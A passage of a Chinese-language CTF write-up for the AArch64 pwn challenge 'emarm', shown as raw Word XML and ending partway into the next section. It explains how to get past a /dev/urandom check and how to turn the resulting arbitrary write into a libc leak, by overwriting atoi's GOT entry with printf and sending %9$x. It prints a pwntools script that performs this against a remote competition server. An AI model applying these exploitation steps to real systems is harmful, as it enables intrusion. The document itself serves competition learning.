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3D7D42" w14:textId="4D38F936" w:rsidR="00C913EF" w:rsidRPr="002343E8" w:rsidRDefault="00C913EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DBD5CB8" w14:textId="60A35FA0" w:rsidR="002343E8" w:rsidRDefault="00FD07E6" w:rsidP="00FD07E6">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>emarm题解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76986D84" w14:textId="6DC3DA77" w:rsidR="00FD07E6" w:rsidRDefault="00FD07E6" w:rsidP="00FD07E6">
      <w:pPr>
        <w:pStyle w:val="2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分析二进制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA0F66D" w14:textId="34462B63" w:rsidR="00FD07E6" w:rsidRDefault="00FD07E6" w:rsidP="00FD07E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过字符串“password”在I</w:t>
      </w:r>
      <w:r>
        <w:t>DA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中定位到main函数位置，并create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CA6A36" w14:textId="33467D6E" w:rsidR="00FD07E6" w:rsidRPr="00FD07E6" w:rsidRDefault="00FD07E6" w:rsidP="00FD07E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3246B91B" wp14:editId="11E7435B">
            <wp:extent cx="4198289" cy="4043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8011" cy="41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A343" w14:textId="47F7BF03" w:rsidR="00FD07E6" w:rsidRDefault="00FD07E6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667A6B7" wp14:editId="0B3C80AA">
            <wp:extent cx="4167188" cy="4014587"/>
            <wp:effectExtent l="0" t="0" r="508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8303" cy="40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E6BE" w14:textId="635AA94D" w:rsidR="00226D26" w:rsidRDefault="00226D2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分析题目逻辑后知道，只要绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>dev/urandom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以任意地址写。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281DDDB8" w14:textId="7958396A" w:rsidR="00226D26" w:rsidRDefault="00A64C3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这里只比较的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是根据输入调整的，因此我们只输入一个字节的，就只比较最低字节的内容。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2^8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的爆破强度是能接受的。</w:t>
      </w:r>
      <w:r w:rsidR="00644A48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（看了另一篇</w:t>
      </w:r>
      <w:r w:rsidR="00644A48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wp</w:t>
      </w:r>
      <w:r w:rsidR="00644A48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，说可以直接输入</w:t>
      </w:r>
      <w:r w:rsidR="00644A48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>’\0’</w:t>
      </w:r>
      <w:r w:rsidR="00644A48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来绕过</w:t>
      </w:r>
      <w:r w:rsidR="00644A48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strncmp</w:t>
      </w:r>
      <w:r w:rsidR="00644A48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就不用爆破了）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FA2840" w14:textId="265D143C" w:rsidR="00226D26" w:rsidRDefault="00226D26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D6FBDF6" wp14:editId="42D79422">
            <wp:extent cx="3448075" cy="809631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8075" cy="8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F98B" w14:textId="60C5E8B1" w:rsidR="00D42146" w:rsidRDefault="00D4214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绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>urandom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限制后，有一个天然的任意地址写。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4016629A" w14:textId="17164092" w:rsidR="00D42146" w:rsidRDefault="00BF6035" w:rsidP="00D42146">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D42146">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泄露libc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A68970" w14:textId="476E9B08" w:rsidR="00D42146" w:rsidRDefault="00D42146" w:rsidP="00D42146">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地调试libc基址是0x</w:t>
      </w:r>
      <w:r>
        <w:t>4000847000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E652AEE" w14:textId="793E4AE2" w:rsidR="00D42146" w:rsidRDefault="00D42146" w:rsidP="00D42146">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CE416D3" wp14:editId="15106490">
            <wp:extent cx="5274310" cy="18859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BD28" w14:textId="1962B820" w:rsidR="00D42146" w:rsidRDefault="00D42146" w:rsidP="00D42146">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用任意地址写将atoi改成printf，通过输入%</w:t>
      </w:r>
      <w:r>
        <w:t>n$x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泄露寄存器或栈上的信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0008A8F2" w14:textId="07123612" w:rsidR="00D42146" w:rsidRPr="00D42146" w:rsidRDefault="00D42146" w:rsidP="00D42146">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B104C3" wp14:editId="6E3EB2A7">
            <wp:extent cx="5274310" cy="3761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6A9F" w14:textId="3549EE25" w:rsidR="00D42146" w:rsidRDefault="00016010">
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">40008676e0 - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>4000847000 = 0x206e0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13719D30" w14:textId="09CD7A76" w:rsidR="00016010" w:rsidRDefault="0099117F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泄露远程的值，为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/>
        </w:rPr>
        <w:t>x8506e0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。对应远程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址为：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/>
        </w:rPr>
        <w:t>x40008506e0 – 0x206e0 = 0x</w:t>
      </w:r>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4000830000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362F3EE9" w14:textId="4C359794" w:rsidR="00016010" w:rsidRDefault="0099117F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F04E155" wp14:editId="42AF5EF8">
            <wp:extent cx="5274310" cy="20631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88EC" w14:textId="04B3D400" w:rsidR="00016010" w:rsidRDefault="0099117F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泄露脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFDFBEB" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B62C3E" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>context(arch='aarch64',log_level='debug')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC1BC1" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2750A2D7" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># fread 0x412060 = 4268128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B83DF35" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># atoi 0x412020 = 4268064</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D16CA92" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># bl .puts :0x400C64 0x400BA4 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E662679" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># lb .printf : 0x400c30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDEA4EE" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>while(1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6A2869" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D17D7" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        #pr = process(['qemu-aarch64','-L','./','-g','1234','emarm'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA868D2" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        #pr = process(['qemu-aarch64','-L','./','emarm'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACA38B2" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr = remote('183.129.189.60',10004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE00F9" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.recvuntil("passwd:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A8111E" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.sendline('1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A5A2BC" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.send('4268064')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E60E349" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        log.warn('success!!!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FC2AF5" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.recvuntil("you will success")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3608BEC3" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.send(p64(0x400c30))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B1CCE" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.recvuntil("i leave for you bye")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDCB5C5" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.send('%9$x')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36237A" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        res = pr.recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FBE226" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        #print p64(res.ljust(8,'\x00'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1FBC0C" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        print res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7DF5F1" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715119BB" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F550C73" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCB78D0" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E67FA7" w14:textId="77777777" w:rsidR="0099117F" w:rsidRPr="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    except EOFError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D8C62A" w14:textId="49BC1D6F" w:rsidR="0099117F" w:rsidRDefault="0099117F" w:rsidP="009911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rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099117F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CADE61A" w14:textId="77777777" w:rsidR="00016010" w:rsidRDefault="00016010">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3567B3B8" w14:textId="68912467" w:rsidR="002343E8" w:rsidRDefault="00BF6035" w:rsidP="00D42146">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
